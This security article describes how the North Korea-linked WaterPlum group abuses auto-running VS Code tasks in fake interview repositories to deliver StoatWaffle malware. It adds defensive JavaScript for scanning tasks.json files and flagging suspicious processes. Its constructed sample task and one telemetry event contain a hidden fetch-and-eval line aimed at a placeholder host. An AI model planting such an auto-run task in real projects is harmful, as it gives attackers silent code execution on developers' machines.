North Korean state-aligned threat actors tracked as WaterPlum and linked to the Contagious Interview campaign are exploiting Visual Studio Code (VS Code) projects as a novel malware delivery channel. By weaponizing the StoatWaffle malware family inside “test” repositories and fake technical interviews, the group is targeting experienced developers in the cryptocurrency and Web3 ecosystem, abusing trust in both integrated development environments (IDEs) and hiring processes.
Malicious VS Code tasks.json: abusing runOn “folderOpen”
According to research by NTT Security, WaterPlum has been abusing the VS Code tasks.json configuration file since late 2025 to achieve near-silent code execution when a project is opened. Setting a task's runOptions.runOn property to "folderOpen" makes VS Code run that task automatically whenever the workspace folder is opened, with no explicit action from the developer beyond marking the workspace as trusted.
In the observed attacks, a malicious task fetches JavaScript from a remote Vercel web application or, in newer variants, from GitHub Gist, and executes it as Node.js code. Because Node.js is inherently cross‑platform, the same malicious logic reliably impacts Windows, macOS, and Linux systems, making this vector particularly attractive to the attackers.
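To make the abused configuration concrete, the following is an added example (not WaterPlum's tasks.json and not NTT Security's or Microsoft's tooling): a small scanner that parses a .vscode/tasks.json and flags tasks that run on folderOpen, pull content from a remote URL, or pass inline code to an interpreter. The field names come from VS Code's documented tasks.json schema; the embedded tasks.json is a constructed sample modelled on the reported pattern, and the URL example.invalid is a placeholder, not a real indicator. VS Code reads tasks.json as JSONC (comments and trailing commas are allowed), so the file is normalised first with a string-aware stripper so that "https://..." inside a command is not mistaken for a line comment.

```javascript
// Added example, not code from the report or the attackers: scan a VS Code
// tasks.json for auto-run tasks that pull and execute remote code.

function stripJsonc(text) {
  // Remove // and /* */ comments and trailing commas without touching strings.
  let out = "";
  let pending = ""; // a comma (plus following whitespace) not yet emitted
  let inString = false;
  const flush = () => { out += pending; pending = ""; };
  for (let i = 0; i < text.length; ) {
    const c = text[i];
    const next = text[i + 1];
    if (inString) {
      out += c;
      if (c === "\\" && next !== undefined) { out += next; i += 2; continue; }
      if (c === '"') inString = false;
      i += 1;
      continue;
    }
    if (c === "/" && next === "/") {            // line comment
      while (i < text.length && text[i] !== "\n") i += 1;
      continue;
    }
    if (c === "/" && next === "*") {            // block comment
      const end = text.indexOf("*/", i + 2);
      i = end === -1 ? text.length : end + 2;
      continue;
    }
    if (c === ",") { flush(); pending = ","; i += 1; continue; }
    if (pending) {
      if (/\s/.test(c)) { pending += c; i += 1; continue; }
      if (c === "}" || c === "]") pending = pending.slice(1); // drop trailing comma
      flush();
    }
    if (c === '"') inString = true;
    out += c;
    i += 1;
  }
  flush();
  return out;
}

const REMOTE_FETCH = /https?:\/\/|\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b|\bfetch\(/i;
const INTERPRETER = /\b(node|nodejs|python3?|pwsh|powershell|bash|sh|zsh)\b/i;
const INLINE_CODE = /(^|\s)-(e|c|p)\s|\beval\(|new Function\(|child_process/i;

function argText(a) {
  // tasks.json args may be plain strings or { value, quoting } objects
  return typeof a === "object" && a !== null ? String(a.value ?? "") : String(a);
}

function taskCommandLine(task) {
  // Flatten command and args, including per-OS overrides, into one string.
  const parts = [];
  for (const scope of [task, task.windows, task.osx, task.linux]) {
    if (!scope) continue;
    if (scope.command !== undefined) parts.push(argText(scope.command));
    if (Array.isArray(scope.args)) parts.push(...scope.args.map(argText));
  }
  return parts.join(" ");
}

function analyzeTasksJson(text) {
  const doc = JSON.parse(stripJsonc(text));
  const tasks = Array.isArray(doc.tasks) ? doc.tasks : [];
  return tasks.map((task) => {
    const command = taskCommandLine(task);
    const autoRun = task.runOptions?.runOn === "folderOpen";
    const reasons = [];
    if (autoRun) reasons.push("runs automatically on folderOpen");
    if (REMOTE_FETCH.test(command)) reasons.push("references a remote URL or download tool");
    if (INTERPRETER.test(command) && INLINE_CODE.test(command)) reasons.push("passes inline code to an interpreter");
    if (task.hide === true || task.presentation?.reveal === "never") reasons.push("hidden from the task list or terminal");
    const severity = autoRun && reasons.length > 1 ? "high" : reasons.length > 0 ? "medium" : "none";
    return { label: task.label ?? "(unlabeled)", autoRun, severity, reasons, command };
  });
}

// Constructed sample tasks.json: one legitimate build task and one hidden
// auto-run task that fetches JavaScript from a placeholder host into node.
const SAMPLE_TASKS_JSON = `{
  // See https://code.visualstudio.com/docs/editor/tasks for the format
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "prepare environment",
      "type": "shell",
      "hide": true,
      "presentation": { "reveal": "never" },
      "command": "node",
      "args": ["-e", "fetch('https://example.invalid/app.js').then(r=>r.text()).then(eval)"],
      "runOptions": { "runOn": "folderOpen" },
    },
  ]
}`;

for (const f of analyzeTasksJson(SAMPLE_TASKS_JSON)) {
  console.log(`[${f.severity}] ${f.label}: ${f.reasons.join("; ") || "no findings"}`);
}
```

Run against a cloned "interview" repository before opening it in the IDE, the scanner reports the build task as clean and the hidden task as high severity on all four counts. The per-OS overrides are included deliberately: a task can carry a clean top-level command and a malicious one under windows, osx, or linux.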
StoatWaffle: modular Node.js malware for multi-stage compromise
The initial StoatWaffle component first checks whether Node.js is installed on the victim system. If not present, it downloads and installs the official Node.js distribution, effectively creating its own execution environment and removing a common dependency barrier for malware on developer workstations.
Once the runtime is available, a downloader module periodically contacts a command-and-control (C2) server to retrieve additional payloads. Researchers describe StoatWaffle as a modular Node.js malware framework that currently includes at least two major module types: a stealer for harvesting credentials and sensitive data, and a remote access trojan (RAT) for full remote control of the compromised host.
This modular design allows WaterPlum operators to add or swap functionality—such as new credential-theft plugins or lateral movement tools—without redeploying the entire campaign. Similar modular tactics have been observed in other advanced persistent threat (APT) operations and enable agile adaptation to defenders’ countermeasures.
Contagious Interview: fake hiring to breach crypto and Web3 companies
Microsoft’s analysis of the Contagious Interview campaign shows that initial access is typically obtained through highly convincing fake recruitment processes. Victims are approached on LinkedIn or other professional channels and invited to participate in a “technical screening,” during which they are instructed to clone repositories or run scripts from platforms such as GitHub, GitLab, or Bitbucket.
Unlike generic phishing, WaterPlum focuses on founders, CTOs, and senior engineers at crypto and Web3 firms, individuals who often control production infrastructure, signing keys, and company wallets. Public reporting includes at least one failed attempt to compromise the founder of AllSecure.io via such a fabricated interview, underscoring the group’s interest in high-value, high-privilege targets.
WaterPlum’s malware ecosystem: OtterCookie, InvisibleFerret, FlexibleFerret
StoatWaffle is only one element in a broader WaterPlum toolset observed in Contagious Interview intrusion chains. Other families include:
OtterCookie – a backdoor with extensive data-theft capabilities that often appears as an early-stage payload before additional components are deployed.
InvisibleFerret – a Python-based backdoor that was historically delivered via a component known as BeaverTail, but is now more frequently installed as a follow-on stage after OtterCookie.
FlexibleFerret (also tracked as WeaselStore) – a modular backdoor available in Go (GolangGhost) and Python (PylangGhost) variants. Security analysts report that FlexibleFerret increasingly acts as the final payload in VS Code–based attacks originating from GitHub repositories, providing long-term persistence and flexible command execution.
Hardening Visual Studio Code and development workflows
In response to abuse of the Tasks feature, Microsoft hardened the task.allowAutomaticTasks setting in VS Code 1.109. By default, the setting now disables automatic task execution from tasks.json when a workspace is opened. Crucially, the option can no longer be overridden at the workspace level, meaning a malicious repository’s .vscode/settings.json cannot silently re-enable auto-run behavior.
VS Code versions 1.109 and 1.110 also add a warning whenever auto-run tasks are detected in a newly opened workspace, complementing the existing Workspace Trust model. Security teams should ensure developers are running a build with these protections and have not re-enabled automatic tasks in their user settings, and developers should be trained to inspect .vscode directories, especially in third‑party repositories or “test projects” provided for interviews.
Beyond IDE settings, organizations in the crypto and Web3 space should establish formal policies for handling coding challenges and interview assignments, treat all external repositories as untrusted code, and monitor for unusual interpreter activity (for example, unexpected Node.js, Python, or Go processes on developer endpoints).
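As an added example of the interpreter monitoring suggested above (this is not from the original report or any vendor product), the following pass over endpoint process-creation events looks for the two behaviours described for this campaign: an IDE process feeding remote code to an interpreter, and an interpreter downloading a runtime installer. The event schema (ts, host, pid, image, parent_image, ancestors, cmdline) is an assumption standing in for whatever EDR or Sysmon feed is in use, and the four events are constructed; host names, paths, and the example.invalid URL are placeholders.

```javascript
// Added example, not part of the original report: process-telemetry
// detections for IDE-spawned interpreters running remote code and for an
// interpreter bootstrapping its own runtime. Event fields are an assumed schema.

const IDE_PROCESS = /Visual Studio Code\.app|Code Helper|(^|[\\/])code(-insiders|-oss)?(\.exe)?$/i;
const INTERPRETER = /(^|[\\/])(node|python3?|pwsh|powershell|sh|bash|zsh|cmd)(\.exe)?$/i;
const REMOTE_CODE = /https?:\/\/|\bcurl\b|\bwget\b|Invoke-WebRequest|DownloadString|\beval\(|(^|\s)-e\s/i;
const RUNTIME_INSTALLER = /nodejs\.org\/dist|node-v\d+\.\d+\.\d+\S*\.(msi|pkg|tar\.(gz|xz))/i;

function lineage(ev) {
  // Direct parent plus any recorded ancestors: shell tasks run through a
  // shell, so the IDE is usually the grandparent of the interpreter.
  return [ev.parent_image, ...(ev.ancestors ?? [])].filter(Boolean);
}

function classifyEvent(ev) {
  const spawnedByIde = lineage(ev).some((p) => IDE_PROCESS.test(p));
  if (spawnedByIde && INTERPRETER.test(ev.image) && REMOTE_CODE.test(ev.cmdline)) {
    return { rule: "ide-spawned interpreter executing remote code", severity: "high" };
  }
  if (INTERPRETER.test(ev.parent_image) && RUNTIME_INSTALLER.test(ev.cmdline)) {
    return { rule: "interpreter downloading a runtime installer", severity: "medium" };
  }
  return null;
}

function runDetections(lines) {
  // lines: newline-delimited JSON events; returns only the events that matched
  const hits = [];
  for (const line of lines) {
    if (!line.trim()) continue;
    const ev = JSON.parse(line);
    const verdict = classifyEvent(ev);
    if (verdict) hits.push({ ts: ev.ts, host: ev.host, pid: ev.pid, ...verdict, cmdline: ev.cmdline });
  }
  return hits;
}

// Constructed events (placeholder host, paths, and URLs; version number illustrative).
const SAMPLE_EVENTS = [
  // benign: a shell task running an ordinary build
  '{"ts":"2026-02-03T09:14:02Z","host":"dev-mbp-07","pid":4101,"parent_image":"/Applications/Visual Studio Code.app/Contents/MacOS/Electron","image":"/bin/zsh","cmdline":"zsh -c npm run build"}',
  // suspicious: node under the IDE with inline code that fetches and evals a remote script
  '{"ts":"2026-02-03T09:14:05Z","host":"dev-mbp-07","pid":4133,"parent_image":"/bin/zsh","ancestors":["/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)"],"image":"/usr/local/bin/node","cmdline":"node -e fetch(\'https://example.invalid/app.js\').then(r=>r.text()).then(eval)"}',
  // suspicious: a node process pulling the official Node.js installer
  '{"ts":"2026-02-03T09:14:09Z","host":"dev-mbp-07","pid":4140,"parent_image":"/usr/local/bin/node","image":"/usr/bin/curl","cmdline":"curl -sSL -o /tmp/node.pkg https://nodejs.org/dist/v22.11.0/node-v22.11.0.pkg"}',
  // benign: a developer fetching package metadata from an interactive shell
  '{"ts":"2026-02-03T09:15:30Z","host":"dev-mbp-07","pid":4202,"parent_image":"/bin/zsh","image":"/usr/bin/curl","cmdline":"curl -sS https://registry.npmjs.org/left-pad"}',
];

for (const hit of runDetections(SAMPLE_EVENTS)) {
  console.log(`${hit.ts} ${hit.host} pid=${hit.pid} [${hit.severity}] ${hit.rule}: ${hit.cmdline}`);
}
```

The ancestry check is the part that matters in practice: VS Code shell tasks launch the interpreter through the user's shell, so a rule keyed only on the direct parent would miss the chain the article describes. The runtime-installer rule is intentionally weaker, since developers do install Node.js, but Node.js spawning the installer for itself is the specific behaviour attributed to StoatWaffle above.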
DPRK IT workers, sanctions evasion, and strategic objectives
WaterPlum’s activity aligns with the broader North Korean cyber program, which blends espionage, theft, and sanctions evasion. The U.S. Department of Justice has reported convictions of U.S. citizens who assisted North Korean IT workers in circumventing sanctions by fronting for them in remote jobs; in one case, the court ordered imprisonment and the forfeiture of more than $190,000 in illicit earnings.
Joint research by Flare and IBM X-Force describes North Korean IT workers as an elite cadre trained at top universities and carefully selected for overseas cyber operations. Their missions include revenue generation, cyber‑espionage, ransomware, and support for other DPRK threat groups. Public blockchain-analytics reporting, such as from Chainalysis, has linked DPRK-aligned actors to over a billion dollars in cryptocurrency theft across recent years, making targeted attacks on crypto developers a logical extension of this strategy.
WaterPlum and Contagious Interview highlight a critical shift: IDEs, code repositories, and recruitment workflows can no longer be treated as inherently safe. Crypto and Web3 organizations should routinely audit VS Code configurations, disable automatic tasks, vet any external test assignments, and deploy endpoint monitoring tuned to developer tools. Combined with regular training on phishing and fake interviews, these measures make it significantly harder for state-backed groups such as WaterPlum to weaponize trusted development environments against the very engineers who rely on them.